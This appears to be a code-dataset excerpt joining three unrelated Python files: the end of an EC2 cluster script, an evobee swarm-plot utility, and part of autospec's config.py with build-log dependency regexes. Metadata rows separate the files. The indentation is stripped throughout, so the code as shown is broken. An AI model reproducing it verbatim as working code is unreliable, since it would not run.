command = "cd %s; sudo docker exec nextdiscovery_mongodbbackup_1 /bin/bash -c 'python ./next/database/database_restore.py %s' " % (EC2_NEXT_PATH,opts.backup_filename)
ssh(master, opts, command)
elif action == "listbucket":
print "listbucket"
list_bucket(opts)
elif action == "createbucket":
print "createbucket"
createbucket(opts)
elif action == "stop":
response = raw_input(
"Are you sure you want to stop the cluster " +
cluster_name + "?\nDATA ON EPHEMERAL DISKS WILL BE LOST, " +
"BUT THE CLUSTER WILL KEEP USING SPACE ON\n" +
"AMAZON EBS IF IT IS EBS-BACKED!!\n" +
"All data on spot-instance slaves will be lost.\n" +
"Stop cluster " + cluster_name + " (y/N): ")
if response == "y":
(master_nodes, slave_nodes) = get_existing_cluster(
conn, opts, cluster_name, die_on_error=False)
print "Stopping master..."
for inst in master_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.stop()
print "Stopping slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
if inst.spot_instance_request_id:
inst.terminate()
else:
inst.stop()
elif action == "start":
(master_nodes, slave_nodes) = get_existing_cluster(conn, opts, cluster_name)
print "Starting slaves..."
for inst in slave_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
print "Starting master..."
for inst in master_nodes:
if inst.state not in ["shutting-down", "terminated"]:
inst.start()
wait_for_cluster_state(
conn=conn,
opts=opts,
cluster_instances=(master_nodes + slave_nodes),
cluster_state='ssh-ready'
)
setup_cluster(conn, master_nodes, slave_nodes, opts, False)
else:
print >> stderr, "Invalid action: %s" % action
sys.exit(1)
def main():
try:
real_main()
except UsageError, e:
print >> stderr, "\nError:\n", e
sys.exit(1)
if __name__ == "__main__":
logging.basicConfig()
main()
| apache-2.0 | 4,556,336,449,640,496,600 | 42.680637 | 206 | 0.581528 | false |
tim-taylor/evobee | utils/plot-mp-distrib-violin.py | 1 | 2936 | #!/usr/bin/env python3
#
# Script to generate a violin plot of the distribution of flower marker points
# from a collection of runs of evobee
#
# Usage: plot-mp-distrib-violin.py title mpcountmpfile [mpcountmpfile2 [mpcountmpfile3 ...]]
# where each mpcountmpfile is a CSV format with layout: marker point, count
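#    e.g. a single line of an mpcountmpfile might read (illustrative): 400,37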
#
# Outputs: a graphics file called mp-distrib-violins-<title>.pdf
#
# Author: Tim Taylor (http://www.tim-taylor.com)
# Last update: 25 May 2020
import sys
import os
import csv
import pandas as pd
import matplotlib.pyplot as plt
import seaborn as sns
def main():
# check we have all of the required command line info
if len(sys.argv) < 3:
print("Usage: {} title mpcountmpfile [mpcountmpfile2 [mpcountmpfile3 ...]]"
.format(os.path.basename(sys.argv[0])), file=sys.stderr)
sys.exit(1)
# parse the command line info
title = sys.argv[1]
mpfilenames = [sys.argv[i] for i in range(2, len(sys.argv))]
#df = pd.DataFrame(index=[], columns=[0,1])
# initialise dataframe with a dummy entry of -1000 for each of the marker points of
# interest. This ensures the plot shows the full range of marker points even if some
# don't have any data points. We restrict the display of the y axis to values of
# 0 or higher so we don't see these dummy entries in the plot.
df = pd.DataFrame({ 0: range(380, 601, 10), 1: [-1000 for i in range(380, 601, 10)]})
for mpfile in mpfilenames:
if not os.path.exists(mpfile) or not os.path.isfile(mpfile):
print("Stats file '{}' does not exist or is not a regular file!".format(mpfile), file=sys.stderr)
exit(1)
dftmp = pd.read_csv(mpfile, header=None)
df = df.append(dftmp, ignore_index=True, sort=False)
df = df.rename(columns={0: "marker_point", 1: "count"})
#sns.set(style="whitegrid", palette="muted")
plt.xlim(375,605)
plt.ylim(0,5500)
plt.xticks(rotation=90)
plt.title(title)
#sns.violinplot(x="marker_point", y="count", data=df, inner=None)
#sns.swarmplot(x="marker_point", y="count", data=df, color="white", edgecolor="gray")
sns.swarmplot(x="marker_point", y="count", data=df)
#plt.show()
# plt.xlabel('Environment size')
# plt.ylabel('Fixation time')
# plt.legend(loc='upper left', prop={'size': 10})
# plt.title(title)
# plt.grid()
# plt.xlim(xmin-2, xmax+2)
# #plt.ylim(140,350)
# #plt.ylim(140,550)
# #plt.show()
# Replace spaces etc in title so we can use it in the filename of the graph
filename = 'mp-distrib-violins-'+title+'.pdf'
for ch in [' ',',','(',')','[',']']:
if ch in filename:
filename = filename.replace(ch,"-")
filename = filename.replace('---','-')
filename = filename.replace('--','-')
plt.savefig(filename)
##-------------------------------------------------------##
if __name__ == '__main__':
main()
| gpl-3.0 | 9,186,626,989,530,743,000 | 29.905263 | 109 | 0.623638 | false |
clearlinux/autospec | autospec/config.py | 1 | 50757 | #!/bin/true
#
# config.py - part of autospec
# Copyright (C) 2015 Intel Corporation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Parse config files
#
import configparser
import os
import re
import subprocess
import sys
import textwrap
from collections import OrderedDict
import check
import license
from util import call, print_warning, write_out
from util import open_auto
def read_pattern_conf(filename, dest, list_format=False, path=None):
"""Read a fail-pattern configuration file.
    Read fail-pattern config file in the form of <pattern>, <package> and ignore lines starting with '#'.
"""
file_repo_dir = os.path.dirname(os.path.abspath(__file__))
file_conf_path = os.path.join(path, filename) if path else None
file_repo_path = os.path.join(file_repo_dir, filename)
if not os.path.isfile(file_repo_path):
return
if file_conf_path and os.path.isfile(file_conf_path):
# The file_conf_path version of a pattern will be used in case of conflict
file_path = [file_repo_path, file_conf_path]
else:
file_path = [file_repo_path]
for fpath in file_path:
with open(fpath, "r") as patfile:
for line in patfile:
if line.startswith("#"):
continue
# Make list format a dict for faster lookup times
if list_format:
dest[line.strip()] = True
continue
# split from the right a maximum of one time, since the pattern
# string might contain ", "
pattern, package = line.rsplit(", ", 1)
dest[pattern] = package.rstrip()
class Config(object):
"""Class to handle autospec configuration."""
def __init__(self, download_path):
"""Initialize Default configuration settings."""
self.content = None # hack to avoid circular init dependency
self.extra_configure = ""
self.extra_configure32 = ""
self.extra_configure64 = ""
self.extra_configure_avx2 = ""
self.extra_configure_avx512 = ""
self.config_files = set()
self.parallel_build = " %{?_smp_mflags} "
self.urlban = ""
self.extra_make = ""
self.extra32_make = ""
self.extra_make_install = ""
self.extra_make32_install = ""
self.extra_cmake = ""
self.extra_cmake_openmpi = ""
self.cmake_srcdir = ".."
self.subdir = ""
self.install_macro = "%make_install"
self.disable_static = "--disable-static"
self.prep_prepend = []
self.build_prepend = []
self.build_append = []
self.make_prepend = []
self.install_prepend = []
self.install_append = []
self.service_restart = []
self.patches = []
self.verpatches = OrderedDict()
self.extra_sources = []
self.autoreconf = False
self.custom_desc = ""
self.custom_summ = ""
self.set_gopath = True
self.license_fetch = None
self.license_show = None
self.git_uri = None
self.os_packages = set()
self.config_file = None
self.old_version = None
self.old_patches = list()
self.old_keyid = None
self.profile_payload = None
self.signature = None
self.yum_conf = None
self.failed_pattern_dir = None
self.alias = None
self.failed_commands = {}
self.ignored_commands = {}
self.maven_jars = {}
self.gems = {}
self.license_hashes = {}
self.license_translations = {}
self.license_blacklist = {}
self.qt_modules = {}
self.cmake_modules = {}
self.cves = []
self.download_path = download_path
self.default_pattern = "make"
self.pattern_strength = 0
self.sources = {"unit": [], "gcov": [], "tmpfile": [], "sysuser": [], "archive": [], "destination": [], "godep": [], "version": []}
self.archive_details = {}
self.conf_args_openmpi = '--program-prefix= --exec-prefix=$MPI_ROOT \\\n' \
'--libdir=$MPI_LIB --bindir=$MPI_BIN --sbindir=$MPI_BIN --includedir=$MPI_INCLUDE \\\n' \
'--datarootdir=$MPI_ROOT/share --mandir=$MPI_MAN -exec-prefix=$MPI_ROOT --sysconfdir=$MPI_SYSCONFIG \\\n' \
'--build=x86_64-generic-linux-gnu --host=x86_64-generic-linux-gnu --target=x86_64-clr-linux-gnu '
# Keep track of the package versions
self.versions = OrderedDict()
# Only parse the versions file once, and save the result for later
self.parsed_versions = OrderedDict()
# defines which files to rename and copy to autospec directory,
# used in commitmessage.py
self.transforms = {
'changes': 'ChangeLog',
'changelog.txt': 'ChangeLog',
'changelog': 'ChangeLog',
'change.log': 'ChangeLog',
'ChangeLog.md': 'ChangeLog',
'changes.rst': 'ChangeLog',
'changes.txt': 'ChangeLog',
'news': 'NEWS',
'meson_options.txt': 'meson_options.txt'
}
self.config_opts = {}
self.config_options = {
"broken_c++": "extend flags with '-std=gnu++98",
"use_lto": "configure build for lto",
"use_avx2": "configure build for avx2",
"use_avx512": "configure build for avx512",
"keepstatic": "do not remove static libraries",
"asneeded": "unset %build LD_AS_NEEDED variable",
"allow_test_failures": "allow package to build with test failures",
"skip_tests": "Do not run test suite",
"no_autostart": "do not require autostart subpackage",
"optimize_size": "optimize build for size over speed",
"funroll-loops": "optimize build for speed over size",
"fast-math": "pass -ffast-math to compiler",
"insecure_build": "set flags to smallest -02 flags possible",
"conservative_flags": "set conservative build flags",
"broken_parallel_build": "disable parallelization during build",
"pgo": "set profile for pgo",
"use_clang": "add clang flags",
"32bit": "build 32 bit libraries",
"nostrip": "disable stripping binaries",
"verify_required": "require package verification for build",
"security_sensitive": "set flags for security-sensitive builds",
"so_to_lib": "add .so files to the lib package instead of dev",
"dev_requires_extras": "dev package requires the extras to be installed",
"autoupdate": "this package is trusted enough to automatically update (used by other tools)",
"compat": "this package is a library compatibility package and only ships versioned library files",
"nodebug": "do not generate debuginfo for this package",
"openmpi": "configure build also for openmpi"
}
# simple_pattern_pkgconfig patterns
# contains patterns for parsing build.log for missing dependencies
self.pkgconfig_pats = [
(r"which: no qmake", "Qt"),
(r"XInput2 extension not found", "xi"),
(r"checking for UDEV\.\.\. no", "udev"),
(r"checking for UDEV\.\.\. no", "libudev"),
(r"XMLLINT not set and xmllint not found in path", "libxml-2.0"),
(r"error\: xml2-config not found", "libxml-2.0"),
(r"error: must install xorg-macros", "xorg-macros")
]
# simple_pattern patterns
# contains patterns for parsing build.log for missing dependencies
self.simple_pats = [
(r'warning: failed to load external entity "http://docbook.sourceforge.net/release/xsl/.*"', "docbook-xml"),
(r"gobject-introspection dependency was not found, gir cannot be generated.", "gobject-introspection-dev"),
(r"gobject-introspection dependency was not found, gir cannot be generated.", "glibc-bin"),
(r"Cannot find development files for any supported version of libnl", "libnl-dev"),
(r"/<http:\/\/www.cmake.org>", "cmake"),
(r"\-\- Boost libraries:", "boost-dev"),
(r"XInput2 extension not found", "inputproto"),
(r"^WARNING: could not find 'runtest'$", "dejagnu"),
(r"^WARNING: could not find 'runtest'$", "expect"),
(r"^WARNING: could not find 'runtest'$", "tcl"),
(r"VignetteBuilder package required for checking but installed:", "R-knitr"),
(r"You must have XML::Parser installed", "perl(XML::Parser)"),
(r"checking for Apache .* module support", "httpd-dev"),
(r"checking for.*in -ljpeg... no", "libjpeg-turbo-dev"),
(r"\* tclsh failed", "tcl"),
(r"\/usr\/include\/python3\.[0-9]+m\/pyconfig.h", "python3-dev"),
(r"checking \"location of ncurses\.h file\"", "ncurses-dev"),
(r"Can't exec \"aclocal\"", "automake"),
(r"Can't exec \"aclocal\"", "libtool"),
(r"configure: error: no suitable Python interpreter found", "python3-dev"),
(r"Checking for header Python.h", "python3-dev"),
(r"configure: error: No curses header-files found", "ncurses-dev"),
(r" \/usr\/include\/python3\.", "python3-dev"),
(r"to compile python extensions", "python3-dev"),
(r"testing autoconf... not found", "autoconf"),
(r"configure\: error\: could not find Python headers", "python3-dev"),
(r"checking for libxml libraries", "libxml2-dev"),
(r"checking for slang.h... no", "slang-dev"),
(r"configure: error: no suitable Python interpreter found", "python3"),
(r"configure: error: pcre-config for libpcre not found", "pcre"),
(r"checking for OpenSSL", "openssl-dev"),
(r"Unable to find the requested Boost libraries.", "boost-dev"),
(r"libproc not found. Please configure without procps", "procps-ng-dev"),
(r"configure: error: glib2", "glib-dev"),
(r"C library 'efivar' not found", "efivar-dev"),
(r"Has header \"efi.h\": NO", "gnu-efi-dev"),
(r"ERROR: Could not execute Vala compiler", "vala"),
(r".*: error: HAVE_INTROSPECTION does not appear in AM_CONDITIONAL", 'gobject-introspection-dev')
]
# failed_pattern patterns
# contains patterns for parsing build.log for missing dependencies
self.failed_pats = [
(r" ! ([a-zA-Z:]+) is not installed", 0, 'perl'),
(r" ([a-zA-Z]+\:\:[a-zA-Z]+) not installed", 1, None),
(r"(?:-- )?(?:Could|Did) (?:NOT|not) find ([a-zA-Z0-9_-]+)", 0, None),
(r" ([a-zA-Z0-9\-]*\.m4) not found", 0, None),
(r" exec: ([a-zA-Z0-9\-]+): not found", 0, None),
(r"([a-zA-Z0-9\-\_\.]*)\: command not found", 1, None),
(r"([a-zA-Z\-]*) (?:validation )?tool not found or not executable", 0, None),
(r"([a-zA-Z\-]+) [0-9\.]+ is required to configure this module; "
r"please install it or upgrade your CPAN\/CPANPLUS shell.", 0, None),
(r"-- (.*) not found.", 1, None),
(r".* /usr/bin/([a-zA-Z0-9-_]*).*not found", 0, None),
(r".*\.go:.*cannot find package \"(.*)\" in any of:", 0, 'go'),
(r"/usr/bin/env\: (.*)\: No such file or directory", 0, None),
(r"/usr/bin/python.*\: No module named (.*)", 0, None),
(r":in `require': cannot load such file -- ([a-zA-Z0-9\-\_:\/]+)", 0, 'ruby table'),
(r":in `require': cannot load such file -- ([a-zA-Z0-9\-\_:]+) ", 0, 'ruby'),
(r"Add the installation prefix of \"(.*)\" to CMAKE_PREFIX_PATH", 0, None),
(r"By not providing \"([a-zA-Z0-9]+).cmake\" in CMAKE_MODULE_PATH this project", 0, None),
(r"C library '(.*)' not found", 0, None),
(r"CMake Error at cmake\/modules\/([a-zA-Z0-9]+).cmake", 0, None),
(r"Can't locate [a-zA-Z0-9_\-\/\.]+ in @INC " r"\(you may need to install the ([a-zA-Z0-9_\-:]+) module\)", 0, 'perl'),
(r"Cannot find ([a-zA-Z0-9\-_\.]*)", 1, None),
(r"Checking for (.*?)\.\.\.no", 0, None),
(r"Checking for (.*?)\s*: not found", 0, None),
(r"Checking for (.*?)\s>=.*\s*: not found", 0, None),
(r"Could not find '([a-zA-Z0-9\-\_]*)' \([~<>=]+ ([0-9.]+).*\) among [0-9]+ total gem", 0, 'ruby'),
(r"Could not find gem '([a-zA-Z0-9\-\_]+) \([~<>=0-9\.\, ]+\) ruby'", 0, 'ruby'),
(r"Could not find suitable distribution for Requirement.parse\('([a-zA-Z\-\.]*)", 0, None),
(r"Download error on https://pypi.python.org/simple/([a-zA-Z0-9\-\._:]+)/", 0, 'pypi'),
(r"Downloading https?://.*\.python\.org/packages/.*/.?/([A-Za-z]*)/.*", 0, None),
(r"ERROR: Could not find a valid gem '([a-zA-Z0-9\-\_\:]*)' \([>=]+ ([0-9.]+).*\)", 0, 'ruby'),
(r"ERROR: dependencies ['‘]([a-zA-Z0-9\-\.]*)['’].* are not available for package ['‘].*['’]", 0, 'R'),
(r"ERROR: dependencies ['‘].*['’], ['‘]([a-zA-Z0-9\-\.]*)['’],.* are not available for package ['‘].*['’]", 0, 'R'),
(r"ERROR: dependencies.*['‘]([a-zA-Z0-9\-\.]*)['’] are not available for package ['‘].*['’]", 0, 'R'),
(r"ERROR: dependency ['‘]([a-zA-Z0-9\-\.]*)['’] is not available for package ['‘].*['’]", 0, 'R'),
(r"Error: Unable to find (.*)", 0, None),
(r"Error: package ['‘]([a-zA-Z0-9\-\.]*)['’] required by", 0, 'R'),
(r"Gem::LoadError: Could not find '([a-zA-Z0-9\-\_]*)'", 0, 'ruby'),
(r"ImportError:.* No module named '?([a-zA-Z0-9\-\._]+)'?", 0, 'pypi'),
(r"ImportError\: ([a-zA-Z]+) module missing", 0, None),
(r"ImportError\: (?:No module|cannot import) named? (.*)", 0, None),
(r"LoadError: cannot load such file -- ([a-zA-Z0-9\-:\/\_]+)", 0, 'ruby table'),
(r"LoadError: cannot load such file -- ([a-zA-Z0-9\-:]+)/.*", 0, 'ruby'),
(r"ModuleNotFoundError.*No module named (.*)", 0, None),
(r"Native dependency '(.*)' not found", 0, "pkgconfig"),
(r"No library found for -l([a-zA-Z\-])", 0, None),
(r"No (?:matching distribution|local packages or working download links) found for ([a-zA-Z0-9\-\.\_]+)", 0, 'pypi'),
(r"No package '([a-zA-Z0-9\-:]*)' found", 0, 'pkgconfig'),
(r"No rule to make target `(.*)',", 0, None),
(r"Package (.*) was not found in the pkg-config search path.", 0, 'pkgconfig'),
(r"Package '([a-zA-Z0-9\-:]*)', required by '.*', not found", 0, 'pkgconfig'),
(r"Package which this enhances but not available for checking: ['‘]([a-zA-Z0-9\-]*)['’]", 0, 'R'),
(r"Perhaps you should add the directory containing `([a-zA-Z0-9\-:]*)\.pc'", 0, 'pkgconfig'),
(r"Program (.*) found: NO", 0, None),
(r"Target '[a-zA-Z0-9\-]' can't be generated as '(.*)' could not be found", 0, None),
(r"Unable to `import (.*)`", 0, None),
(r"Unable to find '(.*)'", 0, None),
(r"WARNING: [a-zA-Z\-\_]+ dependency on ([a-zA-Z0-9\-\_:]*) \([<>=~]+ ([0-9.]+).*\) .*", 0, 'ruby'),
(r"Warning: prerequisite ([a-zA-Z:]+) [0-9\.]+ not found.", 0, 'perl'),
(r"Warning\: no usable ([a-zA-Z0-9]+) found", 0, None),
(r"You need ([a-zA-Z0-9\-\_]*) to build this program.", 1, None),
(r"[Dd]ependency (.*) found: NO \(tried pkgconfig(?: and cmake)?\)", 0, 'pkgconfig'),
(r"[Dd]ependency (.*) found: NO", 0, None),
(r"[a-zA-Z0-9\-:]* is not installed: cannot load such file -- rdoc/([a-zA-Z0-9\-:]*)", 0, 'ruby'),
(r"\/bin\/ld: cannot find (-l[a-zA-Z0-9\_]+)", 0, None),
(r"^.*By not providing \"Find(.*).cmake\" in CMAKE_MODULE_PATH this.*$", 0, None),
(r"^.*Could not find a package configuration file provided by \"(.*)\".*$", 0, None),
(r"^.*\"(.*)\" with any of the following names.*$", 0, None),
(r"[Cc]hecking for (.*) (?:support|development files|with pkg-config)?\.\.\. [Nn]o", 0, None),
(r"checking (.*?)\.\.\. no", 0, None),
(r"checking for (.*) in default path\.\.\. not found", 0, None),
(r"checking for (.*)... configure: error", 0, None),
(r"checking for (.*?)\.\.\. no", 0, None),
(r"checking for [a-zA-Z0-9\_\-]+ in (.*?)\.\.\. no", 0, None),
(r"checking for library containing (.*)... no", 0, None),
(r"checking for perl module ([a-zA-Z:]+) [0-9\.]+... no", 0, 'perl'),
(r"configure: error: (?:pkg-config missing|Unable to locate) (.*)", 0, None),
(r"configure: error: ([a-zA-Z0-9]+) (?:is required to build|not found)", 0, None),
(r"configure: error: Cannot find (.*)\. Make sure", 0, None),
(r"fatal error\: (.*)\: No such file or directory", 0, None),
(r"make: ([a-zA-Z0-9].+): (?:Command not found|No such file or directory)", 0, None),
(r"meson\.build\:[\d]+\:[\d]+\: ERROR: C library \'(.*)\' not found", 0, None),
(r"there is no package called ['‘]([a-zA-Z0-9\-\.]*)['’]", 0, 'R'),
(r"unable to execute '([a-zA-Z\-]*)': No such file or directory", 0, None),
(r"warning: failed to load external entity " r"\"(/usr/share/sgml/docbook/xsl-stylesheets)/.*\"", 0, None),
(r"which\: no ([a-zA-Z\-]*) in \(", 0, None),
(r"you may need to install the ([a-zA-Z0-9_\-:\.]*) module", 0, 'perl'),
]
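        # Illustrative sketch (not part of upstream autospec; variable names are
        # hypothetical): each tuple above is (regex, capture-group index, pattern
        # type) and is matched against build.log lines to recover the name of a
        # missing dependency, e.g.:
        #
        #   m = re.search(r"ImportError:.* No module named '?([a-zA-Z0-9\-\._]+)'?", line)
        #   if m:
        #       missing = m.group(1)   # -> e.g. "six"
        #       req_type = 'pypi'      # the third tuple field selects the requirement table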
def set_build_pattern(self, pattern, strength):
"""Set the global default pattern and pattern strength."""
if strength <= self.pattern_strength:
return
self.default_pattern = pattern
self.pattern_strength = strength
def detect_build_from_url(self, url):
"""Detect build patterns and build requirements from the patterns detected in the url."""
# R package
if "cran.r-project.org" in url or "cran.rstudio.com" in url:
self.set_build_pattern("R", 10)
# python
if "pypi.python.org" in url or "pypi.debian.net" in url:
self.set_build_pattern("distutils3", 10)
# cpan
if ".cpan.org/" in url or ".metacpan.org/" in url:
self.set_build_pattern("cpan", 10)
# ruby
if "rubygems.org/" in url:
self.set_build_pattern("ruby", 10)
# maven
if ".maven." in url:
self.set_build_pattern("maven", 10)
# rust crate
if "crates.io" in url:
self.set_build_pattern("cargo", 10)
# go dependency
if "proxy.golang.org" in url:
self.set_build_pattern("godep", 10)
# php modules from PECL
if "pecl.php.net" in url:
self.set_build_pattern("phpize", 10)
def add_sources(self, archives, content):
"""Add archives to sources and archive_details."""
for srcf in os.listdir(self.download_path):
if re.search(r".*\.(mount|service|socket|target|timer|path)$", srcf):
self.sources["unit"].append(srcf)
self.sources["unit"].sort()
#
# systemd-tmpfiles uses the configuration files from
# /usr/lib/tmpfiles.d/ directories to describe the creation,
# cleaning and removal of volatile and temporary files and
# directories which usually reside in directories such as
# /run or /tmp.
#
if os.path.exists(os.path.normpath(
self.download_path + "/{0}.tmpfiles".format(content.name))):
self.sources["tmpfile"].append(
"{}.tmpfiles".format(content.name))
# ditto sysusers
if os.path.exists(os.path.normpath(
self.download_path + "/{0}.sysusers".format(content.name))):
self.sources["sysuser"].append(
"{}.sysusers".format(content.name))
if content.gcov_file:
self.sources["gcov"].append(content.gcov_file)
self.sources["archive"] = archives[::2]
self.sources["destination"] = archives[1::2]
for archive, destination in zip(archives[::2], archives[1::2]):
self.archive_details[archive + "destination"] = destination
def write_config(self, config_f):
"""Write the config_f to configfile."""
with open(os.path.join(self.download_path, 'options.conf'), 'w') as configfile:
config_f.write(configfile)
def get_metadata_conf(self):
"""Gather package metadata from the content."""
metadata = {}
metadata['name'] = self.content.name
if self.urlban:
metadata['url'] = re.sub(self.urlban, "localhost", self.content.url)
metadata['archives'] = re.sub(self.urlban, "localhost", " ".join(self.content.archives))
else:
metadata['url'] = self.content.url
metadata['archives'] = " ".join(self.content.archives)
metadata['giturl'] = self.content.giturl
metadata['domain'] = self.content.domain
if self.alias:
metadata['alias'] = self.alias
else:
metadata['alias'] = ""
return metadata
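        # For reference (values are hypothetical), this dict becomes the
        # [package] section of options.conf, e.g.:
        #
        #   [package]
        #   name = example-pkg
        #   url = https://example.com/example-pkg-1.0.tar.gz
        #   archives =
        #   giturl =
        #   domain =
        #   alias =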
def rewrite_config_opts(self):
"""Rewrite options.conf file when an option has changed (verify_required for example)."""
config_f = configparser.ConfigParser(interpolation=None, allow_no_value=True)
config_f['package'] = self.get_metadata_conf()
config_f['autospec'] = {}
# Populate missing configuration options
# (in case of a user-created options.conf)
missing = set(self.config_options.keys()).difference(set(self.config_opts.keys()))
for option in missing:
self.config_opts[option] = False
for fname, comment in sorted(self.config_options.items()):
config_f.set('autospec', '# {}'.format(comment))
config_f['autospec'][fname] = 'true' if self.config_opts[fname] else 'false'
self.write_config(config_f)
def create_conf(self):
"""Create options.conf file and use deprecated configuration files or defaults to populate."""
config_f = configparser.ConfigParser(interpolation=None, allow_no_value=True)
# first the metadata
config_f['package'] = self.get_metadata_conf()
# next the options
config_f['autospec'] = {}
for fname, comment in sorted(self.config_options.items()):
config_f.set('autospec', '# {}'.format(comment))
if os.path.exists(fname):
config_f['autospec'][fname] = 'true'
os.remove(fname)
else:
config_f['autospec'][fname] = 'false'
# default lto to true for new things
config_f['autospec']['use_lto'] = 'true'
# renamed options need special care
if os.path.exists("skip_test_suite"):
config_f['autospec']['skip_tests'] = 'true'
os.remove("skip_test_suite")
self.write_config(config_f)
def create_buildreq_cache(self, version, buildreqs_cache):
"""Make the buildreq_cache file."""
content = self.read_conf_file(os.path.join(self.download_path, "buildreq_cache"))
# don't create an empty cache file
if len(buildreqs_cache) < 1:
try:
# file was possibly added to git so we should clean it up
                os.unlink(os.path.join(self.download_path, "buildreq_cache"))
except Exception:
pass
return
if not content:
pkgs = sorted(buildreqs_cache)
else:
pkgs = sorted(set(content[1:]).union(buildreqs_cache))
with open(os.path.join(self.download_path, 'buildreq_cache'), "w") as cachefile:
cachefile.write("\n".join([version] + pkgs))
self.config_files.add('buildreq_cache')
def create_versions(self, versions):
"""Make versions file."""
with open(os.path.join(self.download_path, "versions"), 'w') as vfile:
for version in versions:
vfile.write(version)
if versions[version]:
vfile.write('\t' + versions[version])
vfile.write('\n')
self.config_files.add("versions")
def read_config_opts(self):
"""Read config options from path/options.conf."""
opts_path = os.path.join(self.download_path, 'options.conf')
if not os.path.exists(opts_path):
self.create_conf()
config_f = configparser.ConfigParser(interpolation=None)
config_f.read(opts_path)
if "autospec" not in config_f.sections():
print("Missing autospec section in options.conf")
sys.exit(1)
if 'package' in config_f.sections() and config_f['package'].get('alias'):
self.alias = config_f['package']['alias']
for key in config_f['autospec']:
self.config_opts[key] = config_f['autospec'].getboolean(key)
# Rewrite the configuration file in case of formatting changes since a
# configuration file may exist without any comments (either due to an older
# version of autospec or if it was user-created)
self.rewrite_config_opts()
# Don't use the ChangeLog files if the giturl is set
# ChangeLog is just extra noise when we can already see the gitlog
if "package" in config_f.sections() and config_f['package'].get('giturl'):
keys = []
for k, v in self.transforms.items():
if v == "ChangeLog":
keys.append(k)
for k in keys:
self.transforms.pop(k)
def read_file(self, path, track=True):
"""Read full file at path.
If the file does not exist (or is not expected to exist)
in the package git repo, specify 'track=False'.
"""
try:
with open(path, "r") as f:
if track:
self.config_files.add(os.path.basename(path))
return f.readlines()
except EnvironmentError:
return []
def read_conf_file(self, path, track=True):
"""Read configuration file at path.
If the config file does not exist (or is not expected to exist)
in the package git repo, specify 'track=False'.
"""
lines = self.read_file(path, track=track)
return [line.strip() for line in lines if not line.strip().startswith("#") and line.split()]
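        # Example (hypothetical file contents): a file containing the lines
        #   "# comment", "", "foo", "  bar  "
        # is returned as ["foo", "bar"]: comment and blank lines are dropped
        # and surrounding whitespace is stripped.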
def process_extras_file(self, fname, name, filemanager):
"""Process extras type subpackages configuration."""
content = {}
content['files'] = self.read_conf_file(os.path.join(self.download_path, fname))
req_file = os.path.join(self.download_path, f'{fname}_requires')
if os.path.isfile(req_file):
content['requires'] = self.read_conf_file(req_file)
filemanager.file_maps[name] = content
def process_requires_file(self, fname, requirements, req_type, subpkg=None):
"""Process manual subpackage requirements file."""
content = self.read_conf_file(os.path.join(self.download_path, fname))
for pkg in content:
if req_type == 'add':
requirements.add_requires(pkg, self.os_packages, override=True, subpkg=subpkg)
else:
requirements.ban_requires(pkg, subpkg=subpkg)
def read_script_file(self, path, track=True):
"""Read RPM script snippet file at path.
Returns verbatim, except for possibly the first line.
If the config file does not exist (or is not expected to exist)
in the package git repo, specify 'track=False'.
"""
lines = self.read_file(path, track=track)
if len(lines) > 0 and (lines[0].startswith('#!') or lines[0].startswith('# -*- ')):
lines = lines[1:]
# Remove any trailing whitespace and newlines. The newlines are later
# restored by writer functions.
return [line.rstrip() for line in lines]
def setup_patterns(self, path=None):
"""Read each pattern configuration file and assign to the appropriate variable."""
read_pattern_conf("ignored_commands", self.ignored_commands, list_format=True, path=path)
read_pattern_conf("failed_commands", self.failed_commands, path=path)
read_pattern_conf("maven_jars", self.maven_jars, path=path)
read_pattern_conf("gems", self.gems, path=path)
read_pattern_conf("license_hashes", self.license_hashes, path=path)
read_pattern_conf("license_translations", self.license_translations, path=path)
read_pattern_conf("license_blacklist", self.license_blacklist, list_format=True, path=path)
read_pattern_conf("qt_modules", self.qt_modules, path=path)
read_pattern_conf("cmake_modules", self.cmake_modules, path=path)
def parse_existing_spec(self, name):
"""Determine the old version, old patch list, old keyid, and cves from old spec file."""
spec = os.path.join(self.download_path, "{}.spec".format(name))
if not os.path.exists(spec):
return
found_old_version = False
found_old_patches = False
ver_regex = r"^Version *: *(.*) *$"
patch_regex = r"^Patch[0-9]* *: *(.*) *$"
# If git history exists, read the Version and Patch* spec header fields
# from the latest commit to take priority over the working copy.
cmd = ["git", "-C", self.download_path, "grep", "-E", "-h", ver_regex, "HEAD", spec]
result = subprocess.run(cmd, capture_output=True)
if result.returncode == 0:
# The first matching line is from the spec header (hopefully)
line = result.stdout.decode().split("\n")[0]
m = re.search(ver_regex, line)
if m:
self.old_version = m.group(1)
found_old_version = True
cmd = ["git", "-C", self.download_path, "grep", "-E", "-h", patch_regex, "HEAD", spec]
result = subprocess.run(cmd, capture_output=True)
if result.returncode == 0:
lines = result.stdout.decode().split("\n")
for line in lines:
m = re.search(patch_regex, line)
if m:
self.old_patches.append(m.group(1).lower())
found_old_patches = True
with open_auto(spec, "r") as inp:
for line in inp.readlines():
line = line.strip().replace("\r", "").replace("\n", "")
if "Source0 file verified with key" in line:
keyidx = line.find('0x') + 2
self.old_keyid = line[keyidx:].split()[0] if keyidx > 2 else self.old_keyid
# As a fallback, read the Version and Patch* header fields from the
# working copy of the spec, in case a git repo does not exist.
m = re.search(ver_regex, line)
if m and not found_old_version:
self.old_version = m.group(1)
found_old_version = True
m = re.search(patch_regex, line)
if m and not found_old_patches:
self.old_patches.append(m.group(1).lower())
# Ignore nopatch
for patch in self.patches:
patch = patch.lower()
if patch not in self.old_patches and patch.endswith(".patch") and patch.startswith("cve-"):
self.cves.append(patch.upper().split(".PATCH")[0])
def parse_config_versions(self):
"""Parse the versions configuration file."""
# Only actually parse it the first time around
if not self.parsed_versions:
for line in self.read_conf_file(os.path.join(self.download_path, "versions")):
# Simply whitespace-separated fields
fields = line.split()
version = fields.pop(0)
if len(fields):
url = fields.pop(0)
else:
url = ""
# Catch and report duplicate URLs in the versions file. Don't stop,
# but assume only the first one is valid and drop the rest.
if version in self.parsed_versions and url != self.parsed_versions[version]:
